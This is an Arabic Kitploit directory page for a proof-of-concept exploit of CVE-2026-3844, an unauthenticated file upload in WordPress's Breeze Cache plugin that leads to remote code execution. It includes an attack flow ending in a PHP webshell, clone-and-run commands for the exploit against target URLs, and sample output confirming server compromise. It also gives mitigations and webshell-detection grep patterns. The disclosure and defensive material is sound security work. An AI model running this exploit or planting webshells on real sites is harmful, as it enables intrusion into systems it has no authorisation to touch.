Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-3844 — استغلال PoC لثغرة CVE-2026-3844، وهي ثغرة حرجة لرفع الملفات دون مصادقة في إضافة Breeze الخاصة بـ WordPress، تؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE). | Kitploit
أدوات/GitHubGitHub/tausifzaman/cve-2026-3844
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubtausifzaman/cve-2026-3844

CVE-2026-3844

استغلال PoC لثغرة CVE-2026-3844، وهي ثغرة حرجة لرفع الملفات دون مصادقة في إضافة Breeze الخاصة بـ WordPress، تؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE).

عرض المستودع
3منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-3844

استغلال لإثبات المفهوم (PoC) لـ CVE-2026-3844، وهي ثغرة حرجة لرفع الملفات بدون مصادقة في إضافة Breeze الخاصة بووردبريس تؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE).

CVE-2026-3844 Typing SVG

CVE ID CVSS Score CWE Python WordPress Platform PoC Author



📌 نظرة عامة

CVE-2026-3844 هي ثغرة حرجة لرفع ملفات عشوائي بدون مصادقة في إضافة Breeze Cache لووردبريس (من Cloudways)، وتؤثر على جميع الإصدارات حتى 2.4.4 وما يتضمنه.

يوفر هذا المستودع استغلالًا لإثبات المفهوم (PoC) (CVE-2026-3844.py) للبحث الأمني المصرح به، واختبار الاختراق، والإفصاح المسؤول.


كود من سطر واحد

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3

📊 ملخص الثغرة


🔍 تفاصيل الثغرة

السبب الجذري

إضافة Breeze Cache لووردبريس تجلب صور Gravatar عن بُعد وتخزّنها محليًا عندما تكون ميزة "Host Files Locally – Gravatars" مفعّلة. الدالة المعرّضة للخطر fetch_gravatar_from_remote في class-breeze-cache-cronjobs.php (الأسطر 89–119) لا تُجري أي تحقق من نوع الملف أو امتداده على المحتوى الذي يتم جلبه عن بُعد.

root@kitploit:~
class-breeze-cache-cronjobs.php
  └── fetch_gravatar_from_remote()   ← ❌ No file type validation
        └── Saves remote content directly to disk
              └── Attacker controls → uploads .php webshell → RCE

سير الهجوم

root@kitploit:~
Attacker (Unauthenticated)
    │
    ▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
    │
    ▼
Plugin fetches & saves the .php file without validation
    │
    ▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
    │
    ▼
Attacker accesses webshell → Full RCE achieved

التأثير

في حال استغلال الثغرة بنجاح، يمكن للمهاجم أن:

  • 🔴 تنفيذ أوامر نظام تشغيل عشوائية (RCE)
  • 🔴 رفع أبواب خلفية / ويب شيلز دائمة
  • 🔴 إنشاء حسابات مدير ووردبريس مزيفة
  • 🔴 تسريب قواعد البيانات وبيانات الاعتماد والملفات الحساسة
  • 🔴 تشويه الموقع أو حذف كل المحتوى
  • 🔴 استخدام الخادم للتنقل الجانبي (pivoting) إلى أنظمة أخرى على نفس الشبكة
  • 🔴 تجنيد الخادم في شبكة بوتنت (botnet)

⚙️ المتطلبات

  • Python 3.6+
  • مكتبة requests
  • موقع هدف يعمل بإضافة Breeze Cache ≤ 2.4.4 مع تفعيل خيار "Host Files Locally – Gravatars"

🚀 التثبيت والإعداد

🐧 لينكس / تيرمكس (أندرويد)

root@kitploit:~
# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py

# Navigate into the directory
cd CVE-2026-3844

# Install dependencies
pip install -r requirements.txt

# Run the exploit
python3 CVE-2026-3844.py

🪟 ويندوز (CMD / PowerShell)

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py

🍎 macOS

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py

🤖 تيرمكس (سطر واحد)

root@kitploit:~
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

☁️ Google Cloud Shell (بدون إعداد مسبق)

Open in Cloud Shell

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

💻 الاستخدام

root@kitploit:~
python3 CVE-2026-3844.py

الخيارات

root@kitploit:~
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]

CVE-2026-3844 — Breeze Cache WordPress Plugin Arbitrary File Upload PoC

optional arguments:
  -h, --help              Show this help message and exit
  -u URL, --url URL       Target URL (e.g. https://target.com)
  -t TIMEOUT              Request timeout in seconds (default: 10)
  -o OUTPUT               Save webshell path to output file
  -v, --verbose           Enable verbose/debug output

أمثلة

root@kitploit:~
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com

# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v

# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v

🖥️ إخراج تجريبي لـ PoC

root@kitploit:~
╔══════════════════════════════════════════════════════╗
║          CVE-2026-3844 | Breeze Cache WP RCE        ║
║          Researcher: tausifzaman.online              ║
╚══════════════════════════════════════════════════════╝

[*] Target     : https://vulnerable-site.com
[*] CVE        : CVE-2026-3844
[*] Plugin     : Breeze Cache ≤ 2.4.4
[*] Type       : Unauthenticated Arbitrary File Upload → RCE
[*] Checking target...

[+] Breeze Cache plugin detected!
[+] "Host Files Locally – Gravatars" is ENABLED
[*] Uploading PHP webshell via fetch_gravatar_from_remote...
[+] File uploaded successfully!
[+] Webshell path: /wp-content/breeze-cache/avatar_a1b2c3.php
[*] Verifying RCE...
[+] RCE CONFIRMED!

[+] Command output (id):
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Full server compromise achieved.
[*] Cleanup: Remove /wp-content/breeze-cache/avatar_a1b2c3.php after testing.

🔒 التخفيف والمعالجة

✅ إجراء فوري

حدّث Breeze Cache إلى الإصدار 2.4.5 أو أحدث — هذا هو الإصلاح الكامل الوحيد.

root@kitploit:~
# WordPress CLI — update Breeze plugin immediately
wp plugin update breeze

🛡️ تخفيفات مؤقتة (إذا تعذّر عليك التحديث فورًا)

  1. عطّل خيار "Host Files Locally – Gravatars" في إعدادات Breeze Cache
  2. احجب نقطة النهاية المعرّضة للخطر عبر قاعدة WAF أو .htaccess
  3. امنع تنفيذ PHP في مجلدات uploads و cache:
root@kitploit:~
# Add to /wp-content/uploads/.htaccess and /wp-content/cache/.htaccess
<FilesMatch "\.php$">
    deny from all
</FilesMatch>
  1. افحص عن الملفات المشبوهة المنشأة أو المعدّلة حديثًا:
root@kitploit:~
# Find recently modified PHP files in wp-content (possible webshells)
find /var/www/html/wp-content -name "*.php" -newer /var/www/html/wp-config.php -ls

# Search for common webshell indicators
grep -r "eval(base64_decode" /var/www/html/wp-content/
grep -r "system\|exec\|passthru\|shell_exec" /var/www/html/wp-content/cache/
  1. احجب طلبات POST المشبوهة التي تستهدف وظيفة جلب Gravatar عبر WAF لديك
  2. راقب سجلات الوصول بحثًا عن طلبات إلى /wp-content/breeze-cache/*.php
root@kitploit:~
# Monitor Apache/Nginx access logs for webshell hits
grep "breeze-cache.*\.php" /var/log/apache2/access.log
grep "breeze-cache.*\.php" /var/log/nginx/access.log

🔍 التحقق من وجود اختراق مسبق

root@kitploit:~
# Check for unexpected PHP files in Breeze cache directory
find /var/www/html/wp-content/breeze-cache/ -name "*.php"

# Check for recently created files (last 7 days)
find /var/www/html/wp-content/ -name "*.php" -mtime -7

# Look for admin accounts created recently (run in wp-mysql)
SELECT user_login, user_registered FROM wp_users ORDER BY user_registered DESC LIMIT 10;

📚 المراجع


👤 المؤلف

Tausif Zaman

🌐 tausifzaman.online  ·  🐙 GitHub @tausifzaman

باحث أمني · صياد ثغرات · مطوّر أدوات

Android · Python · PHP · أمن الويب · اختبار الاختراق


⚠️ إخلاء المسؤولية القانوني

يُوفَّر هذا المستودع وكود الاستغلال الموجود فيه لأغراض تعليمية وللبحث الأمني المصرّح به فقط.

  • ✅ يمكنك استخدام هذه الأداة على الأنظمة التي تملكها أو التي لديك إذن كتابي صريح لاختبارها
  • ❌ الاستخدام غير المصرح به ضد أنظمة الطرف الثالث غير قانوني بموجب قانون الاحتيال وإساءة استخدام الحاسوب (CFAA)، وقانون إساءة استخدام الحاسوب (Computer Misuse Act)، والقوانين المماثلة حول العالم
  • لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الضرر أو النشاط غير القانوني الناتج عن هذه الأداة

اختبر بأخلاق. أبلغ بمسؤولية. التزم بالقانون. 🛡️


⭐ إذا ساعدك هذا في بحثك، امنح المستودع نجمة! ⭐

Star   Follow   Website

تنزيل الأداة
الحقلالتفاصيل
معرف CVECVE-2026-3844
الإضافةBreeze Cache (من Cloudways)
الإصدارات المتأثرةجميع الإصدارات ≤ 2.4.4
الإصدار المُصحَّحBreeze 2.4.5+
نوع الثغرةCWE-434 — رفع ملف بدون قيود بنوع خطير
درجة CVSS v3.19.8 (حرجة)
درجة CVSS v2.010.0 (حرجة)
متجه CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
متجه الهجومشبكة (عن بُعد)
المصادقة المطلوبة❌ لا يوجد — بدون مصادقة
الشرطيجب تفعيل خيار "Host Files Locally – Gravatars" (معطّل افتراضيًا)
التأثيرالسرية: عالية · السلامة: عالية · التوفر: عالية
تاريخ النشر2026-04-23
المصدرWordfence / NVD / MITRE
PoCTausif Zaman
المصدرالرابط
🔗 NVD (NIST)nvd.nist.gov/vuln/detail/CVE-2026-3844
🔗 MITRE CVEcve.mitre.org – CVE-2026-3844
🔗 إشعار Wordfencewordfence.com – Threat Intel
🔗 سجل تغييرات إضافة ووردبريسplugins.trac.wordpress.org/changeset/3511463/breeze
🔗 الكود المعرّض للخطر (L89)class-breeze-cache-cronjobs.php#L89
🔗 الكود المعرّض للخطر (L119)class-breeze-cache-cronjobs.php#L119
🔗 إشعار GitHub الأمنيGHSA-c529-q7mw-hq6j
🔗 مستودع PoCgithub.com/tausifzaman/CVE-2026-3844